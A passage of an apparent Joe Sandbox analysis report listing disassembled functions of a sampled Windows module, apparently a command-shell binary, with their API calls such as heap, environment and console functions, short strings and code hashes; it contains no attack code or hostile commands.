                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswdigit
                                      • String ID: GeToken: (%x) '%s'
                                      • API String ID: 3849470556-1994581435
                                      • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                      • Instruction ID: 15c3124fb9d39e7d333c8b9ad81e49a0f3ef7bf77a1f95637a46b36c8adfa514
                                      • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                      • Instruction Fuzzy Hash: 5A519CBBA0864385E760AF55E484179BBA0FF45F18F889935DA4D43390EF7CE841C3A0
                                      Function 00007FF755CB5EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$CurrentDirectorytowupper
                                      • String ID:
                                      • API String ID: 1403193329-0
                                      • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                      • Instruction ID: b68540a24c14c419329bc0e538e1534017e8ebb1e9651a8e135dc8fe28fd25ea
                                      • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                      • Instruction Fuzzy Hash: 3251946BA0568385EB65AF21D9406BAB7A0EF48F6CFC98135DA4D07794EF3C9944C320
                                      Function 00007FF755CA2A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$_setjmp
                                      • String ID:
                                      • API String ID: 3883041866-0
                                      • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                      • Instruction ID: 8dc537b3aeee08a3f130816f35646e9930f2fee496217d54ab0de73bb6021bba
                                      • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                      • Instruction Fuzzy Hash: 77515FB7608B868AEB61DF21D8503E9B7A4FB49B48F884135DA4D87B48DF3CD645CB10
                                      Function 00007FF755CB32E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CB33A8: iswspace.MSVCRT(?,?,00000000,00007FF755CCD6EE,?,?,?,00007FF755CC0632), ref: 00007FF755CB33C0
                                      • iswspace.MSVCRT(?,?,?,00007FF755CB32A4), ref: 00007FF755CB331C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswspace
                                      • String ID: off
                                      • API String ID: 2389812497-733764931
                                      • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                      • Instruction ID: 003e8df3e1e5a76f5f506b14747cec06093b6e38b585308ec7815883466b07b5
                                      • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                      • Instruction Fuzzy Hash: 782160ABE0C65381FB607B1A945427AE690EF45FA8FDCA234D94E47681DE2DEC418321
                                      Function 00007FF755CC9308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                      • String ID: %s=%s$DPATH$PATH
                                      • API String ID: 3731854180-3148396303
                                      • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                      • Instruction ID: c4fdd765b2e1f040bf6f1a3fe2525fb2297020acdc9872d76b99c0a780861842
                                      • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                      • Instruction Fuzzy Hash: AE2192ABB0968780EE94AB55E440279A760AF84F88FCC6135C95E8B795DF6CE440C360
                                      Function 00007FF755CB09F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswspacewcschr
                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                      • API String ID: 287713880-1183017076
                                      • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                      • Instruction ID: de6d9d6c4937d021cb9490cb91b12b1917679e74c13a4f9605baae08714b5cd2
                                      • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                      • Instruction Fuzzy Hash: 5AF044E7A1A69391EA609B01A440176F690FF44F98BCD9535D95D52254EF2CFC40C720
                                      Function 00007FF755CA6A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CB3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF755CB3D0C
                                        • Part of subcall function 00007FF755CB3C24: towupper.MSVCRT ref: 00007FF755CB3D2F
                                        • Part of subcall function 00007FF755CB3C24: iswalpha.MSVCRT ref: 00007FF755CB3D4F
                                        • Part of subcall function 00007FF755CB3C24: towupper.MSVCRT ref: 00007FF755CB3D75
                                        • Part of subcall function 00007FF755CB3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB3DBF
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925,?,?,?,?,00007FF755CAB9B1), ref: 00007FF755CA6ABF
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CA6AD3
                                        • Part of subcall function 00007FF755CA6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF755CA6AE8,?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925), ref: 00007FF755CA6B8B
                                        • Part of subcall function 00007FF755CA6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF755CA6AE8,?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925), ref: 00007FF755CA6B97
                                        • Part of subcall function 00007FF755CA6B84: RtlFreeHeap.NTDLL ref: 00007FF755CA6BAF
                                        • Part of subcall function 00007FF755CA6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA6AF1,?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925), ref: 00007FF755CA6B39
                                        • Part of subcall function 00007FF755CA6B30: RtlFreeHeap.NTDLL ref: 00007FF755CA6B4D
                                        • Part of subcall function 00007FF755CA6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA6AF1,?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925), ref: 00007FF755CA6B59
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925,?,?,?,?,00007FF755CAB9B1), ref: 00007FF755CA6B03
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CA6B17
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                      • String ID:
                                      • API String ID: 3512109576-0
                                      • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                      • Instruction ID: e2e29dddf79685a0669c8b00c34458f5275703eb73b4fc790ccc3de5ac654ea5
                                      • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                      • Instruction Fuzzy Hash: 94217FABE09A8385EB44AB65D4143B8BBA0EF59F49F9C8035C90E47391DF2CA4859370
                                      Function 00007FF755CAB6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAAF82), ref: 00007FF755CAB6D0
                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAAF82), ref: 00007FF755CAB6E7
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAAF82), ref: 00007FF755CAB701
                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAAF82), ref: 00007FF755CAB715
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocSize
                                      • String ID:
                                      • API String ID: 2549470565-0
                                      • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                      • Instruction ID: bb4999945fa7fc23a0d9fae186252f2c1128828b886c1d5c04d2522f79115e69
                                      • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                      • Instruction Fuzzy Hash: E42133BBA09A8386EA55AB11E550078FAB1FF49F8CBCC9931DA4E43750DF7CE4418320
                                      Function 00007FF755CA59E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CB1EA0: wcschr.MSVCRT(?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF755CD0D54), ref: 00007FF755CB1EB3
                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CA5A2E
                                      • _open_osfhandle.MSVCRT ref: 00007FF755CA5A4F
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF755CA260D), ref: 00007FF755CC37AA
                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF755CC37D2
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                      • String ID:
                                      • API String ID: 22757656-0
                                      • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                      • Instruction ID: 8dc6a51781427a159006b3de67ba451e841b3a3422554c9bfa056b53eb01da65
                                      • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                      • Instruction Fuzzy Hash: 9111B6B6A1464687E7505B14E44837CBAA0F789F68FA84734D62D473D0CF3CD4458B10
                                      Function 00007FF755CC5690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF755CC5433,?,?,?,00007FF755CC69B8,?,?,?,?,?,00007FF755CB8C39), ref: 00007FF755CC56C5
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC56D9
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF755CC5433,?,?,?,00007FF755CC69B8,?,?,?,?,?,00007FF755CB8C39), ref: 00007FF755CC56FD
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC5711
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                      • Instruction ID: be8f98a15f077e1babb13bb4fad0e8b64dd81286d9a8971edbef54ebac3dba06
                                      • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                      • Instruction Fuzzy Hash: A6113AB6A04B81C6DB409F56E5040ADBBB0F74DF84B8D8125DB4E03718DF38E496C750
                                      Function 00007FF755CB4AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CB4AD6
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CB4AEF
                                        • Part of subcall function 00007FF755CB4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A28
                                        • Part of subcall function 00007FF755CB4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A66
                                        • Part of subcall function 00007FF755CB4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A7D
                                        • Part of subcall function 00007FF755CB4A14: memmove.MSVCRT(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A9A
                                        • Part of subcall function 00007FF755CB4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4AA2
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CBEE64
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CBEE78
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                      • String ID:
                                      • API String ID: 2759988882-0
                                      • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                      • Instruction ID: 4d959d48388af663785f28c653a4d9a026692cd9bc59ce1b42d60600849a91e8
                                      • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                      • Instruction Fuzzy Hash: 6FF044AAA19F83C6EB8467659404178E9E1FF4EF55FCD8434CD0E86340EE3CA8448330
                                      Function 00007FF755CCF22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ConsoleMode_get_osfhandle
                                      • String ID:
                                      • API String ID: 1606018815-0
                                      • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                      • Instruction ID: a813bace02fdf04323dc030edafde04bd5fb603b6d02a8f93aa07aea353fdb0d
                                      • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                      • Instruction Fuzzy Hash: 9EF01C7AA24A82CBD7446B10E844179FA60FFCAF06F88A234DA0B42394DF3CD0088B10
                                      Function 00007FF755CACAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ConsoleTitle
                                      • String ID: -
                                      • API String ID: 3358957663-3695764949
                                      • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                      • Instruction ID: d0c1437fda6e52d8eccd0841e9f3eb6a89a70ddf35a280c5612929b16ce08be1
                                      • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                      • Instruction Fuzzy Hash: AD3190ABA0864385EA05BB11A814078EAA4FB49FA8FDC5535DA0E177D5EF7CE841C324
                                      Function 00007FF755CB7280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
